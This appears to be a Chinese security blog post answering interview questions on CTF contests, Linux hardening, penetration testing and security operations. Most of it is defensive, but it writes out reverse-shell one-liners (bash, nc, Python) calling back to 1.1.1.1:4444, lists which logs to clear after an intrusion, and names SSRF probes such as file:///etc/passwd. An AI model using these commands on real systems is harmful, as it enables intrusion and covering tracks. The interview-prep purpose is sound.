网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[CTF 攻防赛](#CTF 攻防赛)
哔哩哔哩电面
## CTF 相关 - 简述 CTF 攻防赛的流程和一些技巧; ## 服务器运维 - 查看当前端口连接的命令有哪些?`netstat` 和 `ss` 命令的区别和优缺点; - Linux 服务器的安全运维操作有哪些?如何保护 SSH? - 入侵 Linux 服务器后需要清除哪些日志? - 反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么? ## 渗透测试 - 介绍渗透测试的流程; - 简要介绍自己常用的扫描器和其实现上的特点; - 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些? - 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么? - 介绍 CSRF 漏洞和常用的防护手段; - 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范? ## 安全运营 - 如何防范羊毛党(有猫池)? - 如果 SRC 上报了一个 XSS 漏洞,payload 已经写入页面,但未给出具体位置,如何快速介入? - 发现一个大范围影响的新漏洞,如何快速排查公司资产? - 如果你是安全运营的负责人,简要介绍你对安全方面采取的措施; - 发现了一个漏洞,你报告给开发人员,但是开发人员不愿意修漏洞,如何沟通?(这是个什么奇怪的问题。。。)
CTF 攻防赛
流程与技巧
- 流程
- 准备阶段:熟悉规则、组建团队、分工(逆向、Web、PWN等)。
- 解题模式:通过漏洞利用或密码学挑战获取flag并提交得分。
- 攻防模式:攻击对手服务获取flag,同时加固自身服务防止被攻击。
- 混合模式:结合解题与攻防,动态积分机制。
- 技巧
- 优先解决高分简单题(如Web漏洞)。
- 关注常见漏洞类型(如栈溢出、SQL注入)。
- 使用自动化工具(如pwntools、Burp Suite)。
- 防守时实时监控日志,修补漏洞。
服务器运维
端口连接命令与工具对比
- 命令 :
netstat -antp
、ss -antp
、lsof -i
。- netstat vs ss :
- netstat :依赖
/proc
文件系统,功能全面但性能低(万级连接易卡顿)。- ss :基于内核
netlink
接口,速度更快(毫秒级响应),支持TCP状态过滤(如ss state established
)。Linux安全运维与SSH保护
- 安全操作 :
- 定期更新内核及软件包(
unattended-upgrades
)。- 配置防火墙(
iptables
/nftables
仅放行必要端口)。- 禁用无用服务(
systemctl mask
)。- 日志审计(
auditd
监控敏感文件修改)。- SSH加固 :
- 禁用密码登录,仅允许密钥认证(
PasswordAuthentication no
)。- 限制登录IP(
AllowUsers [email protected]/24
)。- 修改默认端口(
Port 2222
)。- 启用双因素认证(如Google Authenticator)。
入侵后日志清除
- 系统日志 :
/var/log/auth.log
(SSH记录)、/var/log/syslog
(通用日志)。- 隐藏痕迹 :清除
/var/log/wtmp
(登录记录)、~/.bash_history
(命令历史)。- Web日志 :Apache的
access.log
/error.log
,Nginx的access.log
。反弹Shell
常用命令 :
bash`bash -i >& /dev/tcp/1.1.1.1/4444 0>&1 nc -e /bin/sh 1.1.1.1 4444 python -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("1.1.1.1",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])' `
常用类型 :优先反弹
/bin/bash
或/bin/sh
,若环境受限可尝试Python/PHP的伪终端(pty.spawn("/bin/sh")
)。
渗透测试
流程
- 信息收集 :Whois查询、子域名枚举(
subfinder
)、端口扫描(nmap -sV
)。- 漏洞扫描 :使用Nmap脚本(
--script vuln
)、Nessus。- 漏洞利用:Metasploit框架、手工验证(如SQL注入绕过)。
- 后渗透 :提权(
LinPEAS
)、横向移动、数据窃取。- 报告输出:漏洞详情、复现步骤、修复建议(CVSS评分)。
常用扫描器
- Nmap :支持自定义脚本(如
http-sql-injection.nse
),灵活但需手动分析。- Burp Suite:拦截修改请求(Repeater模块测试XSS/SQLi),支持插件扩展(如Collaborator检测SSRF)。
- sqlmap :自动化注入(支持时间盲注、堆查询注入),可绕过WAF(
--tamper
参数)。SQL注入
- 成因 :未过滤用户输入,直接拼接SQL语句(如
"SELECT * FROM users WHERE id=" + input
)。- 防范 :
- 参数化查询(Prepared Statements)。
- 最小化数据库权限(禁止
FILE
权限)。- 注入方式:联合查询、报错注入、布尔盲注、时间盲注。
- 利用扩展 :
- 读写文件(
LOAD_FILE
/INTO OUTFILE
)。- 执行系统命令(MySQL的
sys_exec
,需UDF提权)。XSS防范
- 前端 :
- 转义HTML实体(如
<
转义为<
)。- 启用CSP(
Content-Security-Policy: default-src 'self'
)。- 后端 :输入验证(如白名单过滤
<script>
),输出编码(根据上下文选择HTML/URL编码)。- 优先级:后端防护更关键,前端可被绕过(如Burp修改请求)。
CSRF防护
- 漏洞原理:诱导用户点击链接,以用户身份执行操作(如转账)。
- 防护 :
- 添加Token(随机字符串校验请求来源)。
- 校验Referer头(仅允许本站域名)。
- 关键操作二次验证(如短信确认)。
SSRF利用与防范
- 深入利用 :
- 访问内网服务(如Redis未授权访问)。
- 利用协议(
file:///etc/passwd
、dict://
获取端口信息)。- 非HTTP探测 :
- 使用
gopher://
构造TCP包探测Redis/MySQL。- 利用DNS回显(
http://dnslog.cn
)。- 防范 :
- 禁用URL协议(黑名单过滤
file
、gopher
)。- 使用白名单域名(仅允许访问可信地址)。
安全运营
防范羊毛党
- 技术措施 :
- 设备指纹(识别虚拟机、同一IP多账号)。
- 人机验证(滑块验证、短信验证码)。
- 限流策略(同一用户每分钟最多3次请求)。
- 数据分析:监控异常行为(如凌晨批量注册账号)。
XSS漏洞快速定位
- 排查步骤 :
- 全站搜索写入点(如数据库、缓存中的用户输入)。
- 检查HTTP流量(Burp历史记录中查找payload)。
- 使用浏览器调试工具(审查DOM节点中的可疑脚本)。
新漏洞快速排查
- 流程 :
- 通过CMDB(资产管理系统)拉取受影响组件列表。
- 使用漏洞扫描工具(Nexpose、Nuclei模板批量检测)。
- 优先处理暴露在公网的资产(如边界防火墙后的Web服务)。
安全负责人措施
- 体系构建 :
- 建立SDL(安全开发生命周期),要求安全评审嵌入开发流程。
- 部署WAF、IDS、HIDS(主机入侵检测)。
- 定期红蓝对抗演练。
沟通修复漏洞
- 策略 :
- 量化风险(如漏洞可能导致数据泄露,预估损失金额)。
- 提供修复方案(如代码示例、第三方库升级指南)。
- 上升至管理层(若仍拒绝,通过合规部门推动)。